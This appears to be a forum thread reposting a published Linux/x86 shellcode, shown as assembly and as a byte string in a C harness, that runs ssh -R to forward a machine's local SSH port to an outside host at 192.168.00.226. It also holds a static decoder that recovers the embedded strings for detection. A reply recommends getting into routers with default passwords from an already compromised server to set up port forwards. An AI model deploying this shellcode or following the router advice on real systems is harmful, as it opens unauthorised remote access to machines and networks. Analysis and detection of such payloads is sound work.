Matt

Linux/x86 Remote Port Forwarding Shellcode 87 bytes

Posted

Author : Hamza Megahed

Source : Linux/x86 Remote Port Forwarding Shellcode 87 bytes

Vulnerable App : N/A

Code :

*****************************************************
* Linux/x86 Remote Port forwarding 87 bytes *
* ssh -R 9999:localhost:22 192.168.0.226 *
*****************************************************
* Author: Hamza Megahed *
*****************************************************
* Twitter: @Hamza_Mega *
*****************************************************
* blog: hamza-mega[dot]blogspot[dot]com *
*****************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com *
*****************************************************

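xor %eax,%eax            # eax = 0, pushed below as NUL terminators
push %eax                # terminator for the host string
pushl $0x3632322e        # ".226"
pushl $0x30302e38        # "8.00"
pushl $0x36312e32        # "2.16"
pushw $0x3931            # "19"
movl %esp,%esi           # esi -> host argument
push %eax                # terminator for the forward specification
push $0x32323a74         # "t:22"
push $0x736f686c         # "lhos"
push $0x61636f6c         # "loca"
push $0x3a393939         # "999:"
pushw $0x3930            # "09"
movl %esp,%ebp           # ebp -> forward specification
push %eax                # terminator for the option string
pushw $0x522d            # "-R"
movl %esp,%edi           # edi -> "-R"
push %eax                # terminator for the program path
push $0x6873732f         # "/ssh"
push $0x6e69622f         # "/bin"
push $0x7273752f         # "/usr"
movl %esp,%ebx           # ebx -> "/usr/bin/ssh"
push %eax                # argv[4] = NULL
push %esi                # argv[3] = host
push %ebp                # argv[2] = forward specification
push %edi                # argv[1] = "-R"
push %ebx                # argv[0] = program path
movl %esp,%ecx           # ecx -> argv[]
mov $0xb,%al             # syscall 11 = execve
int $0x80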

********************************
#include <stdio.h>
#include <string.h>

/* Assembled form of the listing above. */
char *shellcode =
"\x31\xc0\x50\x68\x2e\x32\x32\x36\x68\x38\x2e\x30\x30\x68\x32\x2e\x31\x36"
"\x66\x68\x31\x39\x89\xe6\x50\x68\x74\x3a\x32\x32\x68\x6c\x68\x6f\x73\x68"
"\x6c\x6f\x63\x61\x68\x39\x39\x39\x3a\x66\x68\x30\x39\x89\xe5\x50\x66\x68"
"\x2d\x52\x89\xe7\x50\x68\x2f\x73\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75"
"\x73\x72\x89\xe3\x50\x56\x55\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    /* strlen() returns size_t, so print it with %zu; the bytes contain no NUL. */
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    /* Test harness as posted: call the byte string as a function. */
    (*(void(*)()) shellcode)();
    return 0;
}
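An added example, not part of the original post: a static decoder that recovers the strings the shellcode builds on the stack by reading the push-immediate operands from the posted bytes, without executing them. It handles only the opcodes that occur in this sample, and the names `recover_stack_strings`, `prepend`, `MAXS` and `MAXL` are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* The 87 bytes from the post, held as data only; nothing here executes them. */
static const unsigned char sc[] =
"\x31\xc0\x50\x68\x2e\x32\x32\x36\x68\x38\x2e\x30\x30\x68\x32\x2e\x31\x36"
"\x66\x68\x31\x39\x89\xe6\x50\x68\x74\x3a\x32\x32\x68\x6c\x68\x6f\x73\x68"
"\x6c\x6f\x63\x61\x68\x39\x39\x39\x3a\x66\x68\x30\x39\x89\xe5\x50\x66\x68"
"\x2d\x52\x89\xe7\x50\x68\x2f\x73\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75"
"\x73\x72\x89\xe3\x50\x56\x55\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

#define MAXS 8   /* most strings recovered (example limit) */
#define MAXL 64  /* longest string recovered (example limit) */

/* The stack grows down, so each later push lands in front of the earlier ones. */
static void prepend(char *s, const unsigned char *p, size_t n)
{
    size_t old = strlen(s);
    if (old + n >= MAXL) return;
    memmove(s + n, s, old + 1);
    memcpy(s, p, n);
}

/* Returns the number of strings recovered, or -1 on an opcode outside the
   handled subset (push imm32/imm16, push reg, reg-reg xor/mov, mov al, int). */
int recover_stack_strings(const unsigned char *c, size_t len, char out[MAXS][MAXL])
{
    char cur[MAXL] = "";
    int n = 0;
    for (size_t i = 0; i < len; ) {
        size_t step;
        if (c[i] == 0x68 && i + 5 <= len) { prepend(cur, c + i + 1, 4); i += 5; continue; }
        if (c[i] == 0x66 && i + 4 <= len && c[i + 1] == 0x68) { prepend(cur, c + i + 2, 2); i += 4; continue; }
        if (c[i] >= 0x50 && c[i] <= 0x57) step = 1;                              /* push reg */
        else if ((c[i] == 0x31 || c[i] == 0x89) && i + 1 < len && c[i + 1] >= 0xc0) step = 2;
        else if ((c[i] == 0xb0 || c[i] == 0xcd) && i + 1 < len) step = 2;        /* mov al / int */
        else return -1;
        /* Any non-immediate instruction ends the string being assembled. */
        if (cur[0] && n < MAXS) { strcpy(out[n++], cur); cur[0] = '\0'; }
        i += step;
    }
    return n;
}

int main(void)
{
    char out[MAXS][MAXL];
    int n = recover_stack_strings(sc, sizeof sc - 1, out);
    for (int i = 0; i < n; i++) printf("string %d: \"%s\"\n", i, out[i]);
    return n < 0;
}
```

On the posted bytes this recovers `192.168.00.226`, `09999:localhost:22`, `-R` and `/usr/bin/ssh`: the host and port each carry a padding `0` that the banner's command line does not show. A detection rule that matches process arguments should therefore not depend on the banner's exact strings.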

Posted (edited)

Everything is super OK, but most people use routers, and it is pointless to forward from the PC or server if you don't have access to his router to set up the forward. With a certain level of access on a server, pretty much everyone around here knows how to start a remote SSH server. The problem, however, remains the router :)

//edit

If you are remote in a server, blah blah blah, and it uses a router that has no SSH or telnet access from the internal network, I recommend using this to access the router's web interface; most people use the default access passwords, you set up the forward on the router and then voila! Do what you want :P

Many probably know this; I wrote it anyway because maybe there are some who run out of ideas :P

Good luck!

Edited by yo20063
